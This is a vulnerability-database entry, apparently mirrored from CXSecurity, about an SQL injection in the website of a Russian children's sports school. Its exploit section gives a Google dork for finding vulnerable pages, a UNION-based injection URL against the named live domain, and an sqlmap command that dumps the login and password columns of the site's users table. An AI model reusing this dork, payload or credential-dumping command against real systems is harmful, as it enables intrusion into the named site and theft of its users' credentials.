МБОУДО СДЮСШОР № 7 «Акробат» SQL İnjection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1609866 漏洞类型
发布时间 2019-05-15 更新时间 2019-05-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050165
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[*] Exploit Title:МБОУДО СДЮСШОР № 7 «Акробат»  SQL İnjection
-----------------------------------------------------------------------------
Google Dork :intitle:МБОУДО СДЮСШОР № 7 «Акробат» trainers.php?id=3
-----------------------------------------------------------------------------
Date:15.05.2019
-----------------------------------------------------------------------------
Exploit Author:Cerkuday
-----------------------------------------------------------------------------

[*] Tested on: Windows 10 / Kali Linux

[*] Demo:
 
http://www.acrobat-tlt.ru/trainers.php?id=3

Poc 

http://www.acrobat-tlt.ru/trainers.php?id=-6209' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176767671,0x7353694e4867516746665161515a616f784d704b67676267566b68557550517462424c4569686566,0x7171787071),NULL-- RnQo

sqlmap.py -u "http://www.acrobat-tlt.ru/trainers.php?id=3"  --random-agent -D acrobattlt -T users -C login,password --dump